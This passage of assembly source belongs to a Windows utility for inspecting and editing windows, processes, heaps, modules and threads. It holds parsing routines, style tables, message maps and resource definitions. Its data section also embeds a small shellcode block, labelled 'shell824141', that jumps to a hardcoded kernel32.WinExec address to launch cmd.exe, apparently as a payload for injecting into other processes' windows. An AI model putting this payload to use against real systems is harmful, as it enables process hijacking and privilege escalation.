	cmp	[dwOperation],4 ; or
	je	.or
	cmp	[dwOperation],5 ; xor
	je	.xor
	jmp	.skip
.add:	add	ebx,eax
	jmp	.skip
.sub:	sub	ebx,eax
	jmp	.skip
.and:	and	ebx,eax
	jmp	.skip
.or:	or	ebx,eax
	jmp	.skip
.xor:	xor	ebx,eax
.skip:	xor	eax,eax
@@:	lodsb
	test	eax,eax
	jz	.next
	jmp	@B
.quit:	mov	eax,ebx
	pop	esi ebx
	return
;##########################################################################
proc hstr2dw,pszInput
	enter
	mov	edx,[pszInput]
	xor	eax,eax
	xor	ecx,ecx
	jmp	.chk
.char:	mov	cl,[edx]
	cmp	cl,"0"
	jb     .quit
	cmp	cl,"9"
	ja	@F
	; digit
	sub	cl,"0"
	shl	eax,4
	add	eax,ecx
	jmp	.inc
@@:	cmp	cl,"A"
	jb	.quit
	cmp	cl,"F"
	ja	@F
	; uppercase letter
	sub	cl,"A"-10
	shl	eax,4
	add	eax,ecx
	jmp	.inc
@@:	cmp	cl,"a"
	jb	.quit
	cmp	cl,"f"
	ja	.quit
	; lowercase letter
	sub	cl,"a"-10
	shl	eax,4
	add	eax,ecx
.inc:	inc	edx
.chk:	cmp	byte [edx],0
	jne	.char
.quit:	return
;##########################################################################
proc ustr2dw,pszInput
	enter
	mov	edx,[pszInput]
	xor	eax,eax
	xor	ecx,ecx
	jmp	.chk
.char:	mov	cl,[edx]
	sub	cl,"0"
	jb	.quit
	cmp	cl,"9"-"0"
	ja	.quit
	; digit
	lea	eax,[eax*4+eax]
	add	eax,eax
	add	eax,ecx
	inc	edx
.chk:	cmp	byte [edx],0
	jne	.char
.quit:	return
;##########################################################################
proc match,pszMask,pszString
	enter
	push	ebx esi edi
	mov	esi,[pszMask]
	mov	edi,[pszString]
	xor	ebx,ebx
	jmp	.chkz
.next:	movzx	eax,byte [esi]
	cmp	eax,"*"
	jne	.cmp1
	inc	ebx
	inc	esi
	jmp	.chkz
.cmp1:	test	ebx,ebx
	jz	.nowc
	mov	edx,esi
	mov	ecx,edi
.cmp2:	movzx	eax,byte [edx]
	cmp	eax,"*"
	je	.cmp3
	test	eax,eax
	jz	.cmp3
	cmp	eax,"?"
	je	.sc
	cmp	al,[ecx]
	jne	.cmp3
.sc:	inc	edx
	inc	ecx
	jmp	.cmp2
.cmp3:	je	.cmp4
	inc	edi
	cmp	byte [edi],0
	jnz	.next
	xor	eax,eax
	jmp	.quit
.cmp4:	xor	ebx,ebx
	jmp	.mtch
.nowc:	cmp	eax,"?"
	je	.mtch
	cmp	al,[edi]
	je	.mtch
	xor	eax,eax
	jmp	.quit
.mtch:	xor	ebx,ebx
	inc	esi
	inc	edi
.chkz:	cmp	byte [esi],0
	jne	.next
	xor	eax,eax
	inc	eax
	cmp	byte [edi],0
	je	.quit
	mov	eax,ebx
.quit:	pop	edi esi ebx
	return
;##########################################################################
;##########################################################################
;##########################################################################
;##########################################################################
section ".data" import data readable writeable
	library kernel32,"kernel32.dll",user32,"user32.dll",gdi32,"gdi32.dll",comdlg32,"comdlg32.dll",comctl32,"comctl32.dll",advapi32,"advapi32.dll"
	include "%include%/apia/kernel32.inc"
	include "%include%/apia/user32.inc"
	include "%include%/apia/gdi32.inc"
	include "%include%/apia/comdlg32.inc"
	include "%include%/apia/comctl32.inc"
	include "%include%/apia/advapi32.inc"
;##########################################################################
	szAppTitle	db	_TITLE,0
	szMsgAbout	db	_TITLE,13,10
			db	"version ",_VERSIONTEXT, " (build ",_BUILD,")",13,10
			db	"coded by comrade <comrade2k@hotmail.com>",13,10
			db	"18.04.2003 - ",DATE," ",TIME,13,10,13,10
			db	"IRC:",9,"#asm, #coders, #win32asm on EFnet",13,10
			db	"Web:",9,"http://comrade64.cjb.net/",13,10
			db	9,"http://comrade.win32asm.com/",0
	szMenuAbout	db	"&About ",_TITLE,"...",0
	szBuildFile	db	"build.bin",0
	szLibUser32	db	"user32",0
	szProcSMW	db	"SendMessageW",0
	szTabWindows	db	"&Windows",0
	szTabProcesses	db	"&Processes",0
	szTabHeaps	db	"&Heaps",0
	szTabModules	db	"&Modules",0
	szTabThreads	db	"&Threads",0
	szColIndex	db	"Index",0
	szColHandle	db	"Handle",0
	szColTitle	db	"Title",0
	szColClass	db	"Class",0
	szColTID	db	"TID",0
	szColPriority	db	"Priority",0
	szColModule	db	"Module",0
	szColPath	db	"Path",0
	szColAddress	db	"Base Address",0
	szColSize	db	"Size",0
	szColPID	db	"P"
	szColID 	db	"ID",0
	szColType	db	"Type",0
	szColState	db	"State",0
	szColItemData	db	"Item Data",0
	szColSubMenu	db	"Sub Menu Handle",0
	szColImage	db	"Image",0
	szColUser	db	"User",0
	szChangeTitle	db	"Title:",0
	szChangeTransp	db	"Transparency (0 to 255):",0
	szPromptExitCode db	"Exit Code:",0
	szActiveWindow	db	"Active window. Press Ctrl+Alt+F to fix.",0
	szCursorWindow	db	"Window under cursor. Press Ctrl+Alt+F to fix.",0
	szSeparator	db	"================================================",0
	szIDFormat:
	szValueFormat	db	"%u",0
	szHandleFormat	db	"%08X",0
	szBitFormat	db	"%02u (%08X)",0
	szIDNameFormat	db	"%08X  %s",0
	szVarPriority	db	"(%d) %s + %d",0
	szFontFixed	db	"Courier New",0
	szFontName	db	"Tahoma"
	szBlank 	db	0
	tabs		dd	IDD_WINDOWS,DlgWindowsProc
			dd	IDD_PROCESSES,DlgProcessesProc
			dd	IDD_HEAPS,DlgHeapsProc
			dd	IDD_MODULES,DlgModulesProc
			dd	IDD_THREADS,DlgThreadsProc
	menuitemtypes:	dddb	MFT_BITMAP,<"MFT_BITMAP",0>
			dddb	MFT_MENUBARBREAK,<"MFT_MENUBARBREAK",0>
			dddb	MFT_MENUBREAK,<"MFT_MENUBREAK",0>
			dddb	MFT_OWNERDRAW,<"MFT_OWNERDRAW",0>
			dddb	MFT_RADIOCHECK,<"MFT_RADIOCHECK",0>
			dddb	MFT_RIGHTJUSTIFY,<"MFT_RIGHTJUSTIFY",0>
			dddb	MFT_SEPARATOR,<"MFT_SEPARATOR",0>
			dddb	MFT_STRING,<"MFT_STRING",0>
			dd	"ENDL"
	menuitemstates: dddb	MFS_CHECKED,<"MFS_CHECKED",0>
			dddb	MFS_DEFAULT,<"MFS_DEFAULT",0>
			dddb	MFS_DISABLED,<"MFS_DISABLED",0>
			dddb	MFS_ENABLED,<"MFS_ENABLED",0>
			dddb	MFS_GRAYED,<"MFS_GRAYED",0>
			dddb	MFS_HILITE,<"MFS_HILITE",0>
			dddb	MFS_UNCHECKED,<"MFS_UNCHECKED",0>
			dddb	MFS_UNHILITE,<"MFS_UNHILITE",0>
			dd	"ENDL"
	classicons:	dddb	IDI_STATIC,<"Static",0>
			dddb	IDI_EDIT,<"Edit",0>
			dddb	IDI_GROUPBOX,<"Groupbox",0>
			dddb	IDI_PUSHBUTTON,<"Button",0>
			dddb	IDI_COMBOBOX,<"ComboBox",0>
			dddb	IDI_LISTBOX,<"ListBox",0>
			dddb	IDI_HSCROLL,<"HScroll",0>
			dddb	IDI_VSCROLL,<"VScroll",0>
			dddb	IDI_TAB,<"SysTabControl32",0>
			dddb	IDI_TOOLBAR,<"ToolbarWindow32",0>
			dddb	IDI_STATUSBAR,<"msctls_statusbar32",0>
			dddb	IDI_PROGRESSBAR,<"msctls_progress32",0>
			dddb	IDI_TREEVIEW,<"SysTreeView32",0>
			dddb	IDI_LISTVIEW,<"SysListView32",0>
			dddb	IDI_TRACKBAR,<"msctls_trackbar32",0>
			dddb	IDI_COMBOBOXEX,<"ComboBoxEx32",0>
			dddb	IDI_PUSHBUTTON,<"Thunder*CommandButton",0>
			dddb	IDI_EDIT,<"Thunder*TextBox",0>
			dddb	IDI_LISTBOX,<"Thunder*ListBox",0>
			dddb	IDI_COMBOBOX,<"Thunder*ComboBox",0>
			dddb	IDI_RADIOBUTTON,<"Thunder*OptionButton",0>
			dddb	IDI_CHECKBUTTON,<"Thunder*CheckBox",0>
			dddb	IDI_GROUPBOX,<"Thunder*Frame",0>
			dddb	IDI_HSCROLL,<"Thunder*HScrollBar",0>
			dddb	IDI_VSCROLL,<"Thunder*VScrollBar",0>
			dddb	IDI_EDIT,<"TEdit",0>
			dddb	IDI_PUSHBUTTON,<"TButton",0>
			dddb	IDI_COMBOBOX,<"TComboBox",0>
			dddb	IDI_LISTBOX,<"TListBox",0>
			dddb	IDI_PROGRESSBAR,<"TProgressBar",0>
			dd	"ENDL"
	exstyles:	dddb	WS_EX_ACCEPTFILES,<"WS_EX_ACCEPTFILES",0>
			dddb	WS_EX_APPWINDOW,<"WS_EX_APPWINDOW",0>
			dddb	WS_EX_CLIENTEDGE,<"WS_EX_CLIENTEDGE",0>
			dddb	WS_EX_CONTEXTHELP,<"WS_EX_CONTEXTHELP",0>
			dddb	WS_EX_CONTROLPARENT,<"WS_EX_CONTROLPARENT",0>
			dddb	WS_EX_DLGMODALFRAME,<"WS_EX_DLGMODALFRAME",0>
			dddb	WS_EX_LEFT,<"WS_EX_LEFT",0>
			dddb	WS_EX_LEFTSCROLLBAR,<"WS_EX_LEFTSCROLLBAR",0>
			dddb	WS_EX_LTRREADING,<"WS_EX_LTRREADING",0>
			dddb	WS_EX_MDICHILD,<"WS_EX_MDICHILD",0>
			dddb	WS_EX_NOPARENTNOTIFY,<"WS_EX_NOPARENTNOTIFY",0>
			dddb	WS_EX_OVERLAPPEDWINDOW,<"WS_EX_OVERLAPPEDWINDOW",0>
			dddb	WS_EX_PALETTEWINDOW,<"WS_EX_PALETTEWINDOW",0>
			dddb	WS_EX_RIGHT,<"WS_EX_RIGHT",0>
			dddb	WS_EX_RIGHTSCROLLBAR,<"WS_EX_RIGHTSCROLLBAR",0>
			dddb	WS_EX_RTLREADING,<"WS_EX_RTLREADING",0>
			dddb	WS_EX_STATICEDGE,<"WS_EX_STATICEDGE",0>
			dddb	WS_EX_TOOLWINDOW,<"WS_EX_TOOLWINDOW",0>
			dddb	WS_EX_TOPMOST,<"WS_EX_TOPMOST",0>
			dddb	WS_EX_TRANSPARENT,<"WS_EX_TRANSPARENT",0>
			dddb	WS_EX_WINDOWEDGE,<"WS_EX_WINDOWEDGE",0>
			dd	"ENDL"
	styles: 	dddb	WS_BORDER,<"WS_BORDER",0>
			dddb	WS_CAPTION,<"WS_CAPTION",0>
			dddb	WS_CHILD,<"WS_CHILD",0>
			dddb	WS_CHILDWINDOW,<"WS_CHILDWINDOW",0>
			dddb	WS_CLIPCHILDREN,<"WS_CLIPCHILDREN",0>
			dddb	WS_CLIPSIBLINGS,<"WS_CLIPSIBLINGS",0>
			dddb	WS_DISABLED,<"WS_DISABLED",0>
			dddb	WS_DLGFRAME,<"WS_DLGFRAME",0>
			dddb	WS_GROUP,<"WS_GROUP",0>
			dddb	WS_HSCROLL,<"WS_HSCROLL",0>
			dddb	WS_ICONIC,<"WS_ICONIC",0>
			dddb	WS_MAXIMIZE,<"WS_MAXIMIZE",0>
			dddb	WS_MAXIMIZEBOX,<"WS_MAXIMIZEBOX",0>
			dddb	WS_MINIMIZE,<"WS_MINIMIZE",0>
			dddb	WS_MINIMIZEBOX,<"WS_MINIMIZEBOX",0>
			dddb	WS_OVERLAPPED,<"WS_OVERLAPPED",0>
			dddb	WS_OVERLAPPEDWINDOW,<"WS_OVERLAPPEDWINDOW",0>
			dddb	WS_POPUP,<"WS_POPUP",0>
			dddb	WS_POPUPWINDOW,<"WS_POPUPWINDOW",0>
			dddb	WS_SIZEBOX,<"WS_SIZEBOX",0>
			dddb	WS_SYSMENU,<"WS_SYSMENU",0>
			dddb	WS_TABSTOP,<"WS_TABSTOP",0>
			dddb	WS_THICKFRAME,<"WS_THICKFRAME",0>
			dddb	WS_TILED,<"WS_TILED",0>
			dddb	WS_TILEDWINDOW,<"WS_TILEDWINDOW",0>
			dddb	WS_VISIBLE,<"WS_VISIBLE",0>
			dddb	WS_VSCROLL,<"WS_VSCROLL",0>
			dd	"ENDL"
	threadpri:	dddb	THREAD_PRIORITY_IDLE,<"THREAD_PRIORITY_IDLE",0>
			dddb	THREAD_PRIORITY_LOWEST,<"THREAD_PRIORITY_LOWEST",0>
			dddb	THREAD_PRIORITY_BELOW_NORMAL,<"THREAD_PRIORITY_BELOW_NORMAL",0>
			dddb	THREAD_PRIORITY_NORMAL,<"THREAD_PRIORITY_NORMAL",0>
			dddb	THREAD_PRIORITY_ABOVE_NORMAL,<"THREAD_PRIORITY_ABOVE_NORMAL",0>
			dddb	THREAD_PRIORITY_HIGHEST,<"THREAD_PRIORITY_HIGHEST",0>
			dddb	THREAD_PRIORITY_TIME_CRITICAL,<"THREAD_PRIORITY_TIME_CRITICAL",0>
			dd	"ENDL"
	mainmsg 	dd	WM_INITDIALOG,DlgProc.initdlg
			dd	WM_COMMAND,DlgProc.command
			dd	WM_SYSCOMMAND,DlgProc.syscommand
			dd	WM_NOTIFY,DlgProc.notify
			dd	WM_SIZE,DlgProc.size
			dd	WM_CLOSE,DlgProc.close
			dd	0
	windowsmsg	dd	WM_INITDIALOG,DlgWindowsProc.initdlg
			dd	WM_SIZE,DlgWindowsProc.size
			dd	WM_COMMAND,DlgWindowsProc.command
			dd	WM_NOTIFY,DlgWindowsProc.notify
			dd	WM_SETFOCUS,DlgWindowsProc.setfocus
			dd	WM_NOTIFY,DlgWindowsProc.notify
			dd	WM_HOTKEY,DlgWindowsProc.hotkey
			dd	WM_CLOSE,DlgWindowsProc.close
			dd	0
	processesmsg	dd	WM_INITDIALOG,DlgProcessesProc.initdlg
			dd	WM_COMMAND,DlgProcessesProc.command
			dd	WM_NOTIFY,DlgProcessesProc.notify
			dd	WM_SIZE,DlgProcessesProc.size
			dd	WM_CLOSE,DlgProcessesProc.close
			dd	0
	heapsmsg	dd	WM_INITDIALOG,DlgHeapsProc.initdlg
			dd	WM_COMMAND,DlgHeapsProc.command
			dd	WM_NOTIFY,DlgHeapsProc.notify
			dd	WM_SIZE,DlgHeapsProc.size
			dd	WM_CLOSE,DlgHeapsProc.close
			dd	0
	modulesmsg	dd	WM_INITDIALOG,DlgModulesProc.initdlg
			dd	WM_COMMAND,DlgModulesProc.command
			dd	WM_NOTIFY,DlgModulesProc.notify
			dd	WM_SIZE,DlgModulesProc.size
			dd	WM_CLOSE,DlgModulesProc.close
			dd	0
	threadsmsg	dd	WM_INITDIALOG,DlgThreadsProc.initdlg
			dd	WM_COMMAND,DlgThreadsProc.command
			dd	WM_NOTIFY,DlgThreadsProc.notify
			dd	WM_SIZE,DlgThreadsProc.size
			dd	WM_CLOSE,DlgThreadsProc.close
			dd	0
	inputboxmsg	dd	WM_INITDIALOG,DlgInputBoxProc.initdlg
			dd	WM_COMMAND,DlgInputBoxProc.command
			dd	WM_CLOSE,DlgInputBoxProc.close
			dd	0
	menulistmsg	dd	WM_INITDIALOG,DlgMenuListProc.initdlg
			dd	WM_COMMAND,DlgMenuListProc.command
			dd	WM_NOTIFY,DlgMenuListProc.notify
			dd	WM_SETFOCUS,DlgMenuListProc.setfocus
			dd	WM_SIZE,DlgMenuListProc.size
			dd	WM_CLOSE,DlgMenuListProc.close
			dd	0
	editmenumsg	dd	WM_INITDIALOG,DlgEditMenuProc.initdlg
			dd	WM_COMMAND,DlgEditMenuProc.command
			dd	WM_CLOSE,DlgEditMenuProc.close
			dd	0
	chposmsg	dd	WM_INITDIALOG,DlgChPosProc.initdlg
			dd	WM_COMMAND,DlgChPosProc.command
			dd	WM_CLOSE,DlgChPosProc.close
			dd	0
	sendmsgmsg	dd	WM_INITDIALOG,DlgSendMsgProc.initdlg
			dd	WM_COMMAND,DlgSendMsgProc.command
			dd	WM_CLOSE,DlgSendMsgProc.close
			dd	0
	flagsmsg	dd	WM_INITDIALOG,DlgFlagsProc.initdlg
			dd	WM_COMMAND,DlgFlagsProc.command
			dd	WM_MEASUREITEM,DlgFlagsProc.measureitem
			dd	WM_DRAWITEM,DlgFlagsProc.drawitem
			dd	WM_CLOSE,DlgFlagsProc.close
			dd	0
	sendkeysmsg	dd	WM_INITDIALOG,DlgSendKeysProc.initdlg
			dd	WM_COMMAND,DlgSendKeysProc.command
			dd	WM_CLOSE,DlgSendKeysProc.close
			dd	0
	listboxmsg	dd	WM_INITDIALOG,DlgListBoxProc.initdlg
			dd	WM_COMMAND,DlgListBoxProc.command
			dd	WM_NOTIFY,DlgListBoxProc.notify
			dd	WM_CLOSE,DlgListBoxProc.close
			dd	0
	comboboxmsg	dd	WM_INITDIALOG,DlgComboBoxProc.initdlg
			dd	WM_COMMAND,DlgComboBoxProc.command
			dd	WM_CLOSE,DlgComboBoxProc.close
			dd	0
	listviewmsg	dd	WM_INITDIALOG,DlgListViewProc.initdlg
			dd	WM_COMMAND,DlgListViewProc.command
			dd	WM_CLOSE,DlgListViewProc.close
			dd	0
	treeviewmsg	dd	WM_INITDIALOG,DlgTreeViewProc.initdlg
			dd	WM_COMMAND,DlgTreeViewProc.command
			dd	WM_CLOSE,DlgTreeViewProc.close
			dd	0
	toolbarmsg	dd	WM_INITDIALOG,DlgToolbarProc.initdlg
			dd	WM_COMMAND,DlgToolbarProc.command
			dd	WM_CLOSE,DlgToolbarProc.close
			dd	0
	statusbarmsg	dd	WM_INITDIALOG,DlgStatusbarProc.initdlg
			dd	WM_COMMAND,DlgStatusbarProc.command
			dd	WM_CLOSE,DlgStatusbarProc.close
			dd	0
	tabmsg		dd	WM_INITDIALOG,DlgTabProc.initdlg
			dd	WM_COMMAND,DlgTabProc.command
			dd	WM_CLOSE,DlgTabProc.close
			dd	0

	shell824141:	times 1A0h dd 7C4E2F60h
			db 0EBh,16h,90h,90h
			dd 7C4E2F60h  ; call ebx
			dd 12345678h
			dd 12345678h
			db "cmd.exe",0
.loader:
	times 04h db 90h
	add ebx,10h
	mov eax,7C4E9C1Dh	; kernel32.WinExec
	mov eax,7C4E9C1Dh
	push ebx 1
	mov dword [ebx-10h],0CCCCCCCCh
	jmp eax
	db 0
;##########################################################################
	align 04h
	hInstance	rd	01h
	hIcon		rd	01h
    hTabs:
	hWindowsWnd	rd	01h
	hProcessesWnd	rd	01h
	hHeapsWnd	rd	01h
	hModulesWnd	rd	01h
	hThreadsWnd	rd	01h
	hMenuPopup	rd	01h
	hImageList	rd	01h
	dwValue 	rd	01h
	hFontList	rd	01h
	hFontListBold	rd	01h
	hFontFixed	rd	01h
	hBackDC 	rd	01h
	hBackBmp	rd	01h
	dwSortColumn	rd	01h
	szTitle 	rb	200h
	szClass 	rb	200h
	szFlags 	rb	200h
	szValue 	rb	200h
	szItemPrimary	rb	100h
	szItemSecondary rb	100h
	szHandle	rb	10h
	ofn		OPENFILENAME
	iccx		INITCOMMONCONTROLSEX
	tci		TCITEM
	rc		RECT
	rcItem		RECT
	rcClient	RECT
	lvc		LVCOLUMN
	lvi		LVITEM
	pt		POINT
	mii		MENUITEMINFO
	nmhdr		NMHDR
	lvfi		LVFINDINFO
	pe32		PROCESSENTRY32
	te32		THREADENTRY32
;##########################################################################
section ".rsrc" resource data readable
	; identifiers
	IDV_MAIN		= 1
	IDI_MAIN		= 2
	IDB_IMAGELIST		= 10
	IDI_BLANK		= 0
	IDI_CHECK		= 1
	IDI_COLLAPSED		= 2
	IDI_EXPANDED		= 3
	IDI_STATIC		= 4
	IDI_EDIT		= 5
	IDI_GROUPBOX		= 6
	IDI_PUSHBUTTON		= 7
	IDI_CHECKBUTTON 	= 8
	IDI_RADIOBUTTON 	= 9
	IDI_COMBOBOX		= 10
	IDI_LISTBOX		= 11
	IDI_HSCROLL		= 12
	IDI_VSCROLL		= 13
	IDI_TAB 		= 14
	IDI_TOOLBAR		= 15
	IDI_STATUSBAR		= 16
	IDI_PROGRESSBAR 	= 17
	IDI_TREEVIEW		= 18
	IDI_LISTVIEW		= 19
	IDI_TRACKBAR		= 20
	IDI_COMBOBOXEX		= 21
	IDD_MAIN		= 20
	IDD_WINDOWS		= 21
	IDD_PROCESSES		= 22
	IDD_HEAPS		= 23
	IDD_MODULES		= 24
	IDD_THREADS		= 25
	IDD_INPUTBOX		= 26
	IDD_MENULIST		= 27
	IDD_CHPOS		= 28
	IDD_SENDMSG		= 29
	IDD_FLAGS		= 30
	IDD_SENDKEYS		= 31
	IDD_EDITMENU		= 32
	IDD_LISTBOX		= 33
	IDD_COMBOBOX		= 34
	IDD_LISTVIEW		= 35
	IDD_TREEVIEW		= 36
	IDD_TOOLBAR		= 37
	IDD_STATUSBAR		= 38
	IDD_TAB 		= 39
	IDM_POPUPMENU		= 40
	IDM_WIN_REFRESH_ALL	= 101
	IDM_WIN_REFRESH_VIS	= 102
	IDM_WIN_REFRESH_ALLREC	= 103
	IDM_WIN_REFRESH_VISREC	= 104
	IDM_WIN_STNORM		= 105
	IDM_WIN_STMIN		= 106
	IDM_WIN_STMAX		= 107
	IDM_WIN_ALWAYSONTOP	= 108
	IDM_WIN_VISIBLE 	= 109
	IDM_WIN_ENABLED 	= 110
	IDM_WIN_TRANSPARENCY	= 111
	IDM_WIN_STYLES		= 112
	IDM_WIN_EXSTYLES	= 113
	IDM_WIN_EDITMENU	= 114
	IDM_WIN_EDITSYSMENU	= 115
	IDM_WIN_EDITTITLE	= 116
	IDM_WIN_CHPOS		= 117
	IDM_WIN_SENDMSG 	= 118
	IDM_WIN_SENDKEYS	= 119
	IDM_WIN_SPECIAL_LISTBOX = 120
	IDM_WIN_SPECIAL_COMBOBOX= 121
	IDM_WIN_SPECIAL_LISTVIEW= 122
	IDM_WIN_SPECIAL_TREEVIEW= 123
	IDM_WIN_SPECIAL_TOOLBAR = 124
	IDM_WIN_SPECIAL_STATUSBAR= 125
	IDM_WIN_SPECIAL_TAB	= 126
	IDM_WIN_COPY_HANDLE	= 130
	IDM_WIN_COPY_ID 	= 131
	IDM_WIN_COPY_TITLE	= 132
	IDM_WIN_COPY_CLASS	= 133
	IDM_WIN_SHELL		= 134
	IDM_WIN_DESTROY 	= 135
	IDM_WIN_QUITTHREAD	= 136
	IDM_WIN_CLOSE		= 137
	IDM_PROC_REFRESH	= 138
	IDM_PROC_GOTOPARENT	= 139
	IDM_PROC_GOTOHEAPS	= 140
	IDM_PROC_GOTOMODULES	= 141
	IDM_PROC_GOTOTHREADS	= 142
	IDM_PROC_TERMINATE	= 143
	IDM_MENU_EDIT		= 144
	IDM_MENU_INSERT 	= 145
	ID_MAIN_TAB		= 1
	ID_WIN_WINDOWS		= 1
	ID_PROC_PROCESSES	= 1
	ID_HEAPS_PROCESS	= 1
	ID_HEAPS_HEAPS		= 2
	ID_MOD_PROCESS		= 1
	ID_MOD_MODULES		= 2
	ID_THREADS_PROCESS	= 1
	ID_THREADS_THREADS	= 2
	ID_INPUTBOX_PROMPT	= 1
	ID_INPUTBOX_VALUE	= 2
	ID_INPUTBOX_OK		= 3
	ID_INPUTBOX_CANCEL	= 4
	ID_MENULIST_MENULIST	= 1
	ID_CHPOS_SCREEN 	= 1
	ID_CHPOS_CLIENT 	= 2
	ID_CHPOS_LEFT		= 3
	ID_CHPOS_TOP		= 4
	ID_CHPOS_WIDTH		= 5
	ID_CHPOS_HEIGHT 	= 6
	ID_CHPOS_SET		= 7
	ID_CHPOS_CENTER 	= 8
	ID_CHPOS_CLOSE		= 9
	ID_SENDMSG_HWND 	= 1
	ID_SENDMSG_MSG		= 2
	ID_SENDMSG_WPARAM	= 3
	ID_SENDMSG_LPARAM	= 4
	ID_SENDMSG_SENDMSG	= 5
	ID_SENDMSG_POSTMSG	= 6
	ID_FLAGS_NAMED		= 1
	ID_FLAGS_BINARY 	= 2
	ID_FLAGS_LIST		= 3
	ID_FLAGS_ADDITIONALLABEL= 4
	ID_FLAGS_ADDITIONAL	= 5
	ID_FLAGS_FLAGS		= 6
	ID_FLAGS_OK		= 7
	ID_FLAGS_CANCEL 	= 8
	ID_SENDKEYS_KEYS	= 1
	ID_SENDKEYS_SEND	= 2
	ID_SENDKEYS_CLOSE	= 3
	ID_EDITMENU_ID		= 01
	ID_EDITMENU_TYPE	= 02
	ID_EDITMENU_EDITTYPE	= 03
	ID_EDITMENU_STATE	= 04
	ID_EDITMENU_EDITSTATE	= 05
	ID_EDITMENU_TYPEDATA	= 06
	ID_EDITMENU_EDITTYPEDATA= 07
	ID_EDITMENU_ITEMDATA	= 08
	ID_EDITMENU_OK		= 09
	ID_EDITMENU_CANCEL	= 10
	ID_LISTBOX_LIST 	= 1
	ID_LISTBOX_TITLE	= 2
	ID_LISTBOX_ITEMDATA	= 3
	ID_LISTBOX_ADD		= 4
	ID_LISTBOX_UPDATE	= 5
	ID_LISTBOX_REMOVE	= 6
	ID_LISTBOX_MOVEUP	= 7
	ID_LISTBOX_MOVEDOWN	= 8
	ID_LISTBOX_CLOSE	= 9
	ID_COMBOBOX_LIST	= 1
	ID_COMBOBOX_TITLE	= 2
	ID_COMBOBOX_ITEMDATA	= 3
	ID_COMBOBOX_ADD 	= 4
	ID_COMBOBOX_UPDATE	= 5
	ID_COMBOBOX_REMOVE	= 6
	ID_COMBOBOX_MOVEUP	= 7
	ID_COMBOBOX_MOVEDOWN	= 8
	ID_COMBOBOX_CLOSE	= 9
	ID_LISTVIEW_LIST	= 1
	ID_LISTVIEW_MASK	= 2
	ID_LISTVIEW_MASKEDIT	= 3
	ID_LISTVIEW_ITEM	= 4
	ID_LISTVIEW_SUBITEM	= 5
	ID_LISTVIEW_STATE	= 6
	ID_LISTVIEW_STATEEDIT	= 7
	ID_LISTVIEW_STATEMASK	= 8
	ID_LISTVIEW_STATEMASKEDIT=9
	ID_LISTVIEW_TEXT	= 10
	ID_LISTVIEW_IMAGE	= 11
	ID_LISTVIEW_PARAM	= 12
	ID_LISTVIEW_ADD 	= 13
	ID_LISTVIEW_UPDATE	= 14
	ID_LISTVIEW_CLOSE	= 15
	ID_TREEVIEW_CLOSE	= 1
	ID_TOOLBAR_CLOSE	= 1
	ID_STATUSBAR_CLOSE	= 1
	ID_TAB_CLOSE		= 1
	; resources
	directory RT_VERSION,versions,RT_MENU,menus,RT_DIALOG,dialogs,RT_BITMAP,bitmaps,RT_GROUP_ICON,grpicons,RT_ICON,icons
	resource versions,IDV_MAIN,SUBLANG_NEUTRAL+LANG_NEUTRAL,version
	resource menus,  IDM_POPUPMENU, SUBLANG_NEUTRAL+LANG_NEUTRAL,popmenu
	resource dialogs,IDD_MAIN,	SUBLANG_NEUTRAL+LANG_NEUTRAL,main,\
			 IDD_WINDOWS,	SUBLANG_NEUTRAL+LANG_NEUTRAL,windows,\
			 IDD_PROCESSES, SUBLANG_NEUTRAL+LANG_NEUTRAL,processes,\
			 IDD_HEAPS,	SUBLANG_NEUTRAL+LANG_NEUTRAL,heaps,\
			 IDD_MODULES,	SUBLANG_NEUTRAL+LANG_NEUTRAL,modules,\
			 IDD_THREADS,	SUBLANG_NEUTRAL+LANG_NEUTRAL,threads,\
			 IDD_INPUTBOX,	SUBLANG_NEUTRAL+LANG_NEUTRAL,inputbox,\
			 IDD_MENULIST,	SUBLANG_NEUTRAL+LANG_NEUTRAL,menulist,\
			 IDD_CHPOS,	SUBLANG_NEUTRAL+LANG_NEUTRAL,chpos,\
			 IDD_SENDMSG,	SUBLANG_NEUTRAL+LANG_NEUTRAL,sendmsg,\
			 IDD_FLAGS,	SUBLANG_NEUTRAL+LANG_NEUTRAL,flags,\
			 IDD_SENDKEYS,	SUBLANG_NEUTRAL+LANG_NEUTRAL,sendkeys,\
			 IDD_EDITMENU,	SUBLANG_NEUTRAL+LANG_NEUTRAL,editmenu,\
			 IDD_LISTBOX,	SUBLANG_NEUTRAL+LANG_NEUTRAL,listbox,\
			 IDD_COMBOBOX,	SUBLANG_NEUTRAL+LANG_NEUTRAL,combobox,\
			 IDD_LISTVIEW,	SUBLANG_NEUTRAL+LANG_NEUTRAL,listview,\
			 IDD_TREEVIEW,	SUBLANG_NEUTRAL+LANG_NEUTRAL,treeview,\
			 IDD_TOOLBAR,	SUBLANG_NEUTRAL+LANG_NEUTRAL,toolbar,\
			 IDD_STATUSBAR, SUBLANG_NEUTRAL+LANG_NEUTRAL,statusbar,\
			 IDD_TAB,	SUBLANG_NEUTRAL+LANG_NEUTRAL,tab
	resource bitmaps,IDB_IMAGELIST, SUBLANG_NEUTRAL+LANG_NEUTRAL,imagelistbitmap
	resource grpicons,IDI_MAIN,SUBLANG_NEUTRAL+LANG_NEUTRAL,mainicon
	resource icons,        01h,SUBLANG_NEUTRAL+LANG_NEUTRAL,main32x32x4icondata,\
			       02h,SUBLANG_NEUTRAL+LANG_NEUTRAL,main16x16x4icondata
	; version
	version version,VOS__WINDOWS32,VFT_APP,VFT2_UNKNOWN,SUBLANG_NEUTRAL+LANG_NEUTRAL,0,\
		"FileDescription",_TITLE,\
		"LegalCopyright",<0A9h," comrade">,\
		"FileVersion",_VERSION,\
		"ProductVersion",_VERSION,\
		"ProductName",_TITLE,\
		"InternalName",_NAME,\
		"OriginalFilename",<_NAME,".exe">
	; popup menu
	menu popmenu
		menuitem "&Windows",0,MFR_POPUP
			menuitem "&Refresh",0,MFR_POPUP
				menuitem "&All",IDM_WIN_REFRESH_ALL,0
				menuitem "&Visible Only",IDM_WIN_REFRESH_VIS,0
				menuseparator
				menuitem "&All (recurse)",IDM_WIN_REFRESH_ALLREC,0
				menuitem "&Visible Only (recurse)",IDM_WIN_REFRESH_VISREC,MFR_END
			menuseparator
			menuitem "&State",0,MFR_POPUP
				menuitem "&Normal",IDM_WIN_STNORM,0
				menuitem "&Minimized",IDM_WIN_STMIN,0
				menuitem "Ma&ximized",IDM_WIN_STMAX,MFR_END
			menuitem "&Always on top",IDM_WIN_ALWAYSONTOP,0
			menuitem "&Visible",IDM_WIN_VISIBLE,0
			menuitem "&Enabled",IDM_WIN_ENABLED,0
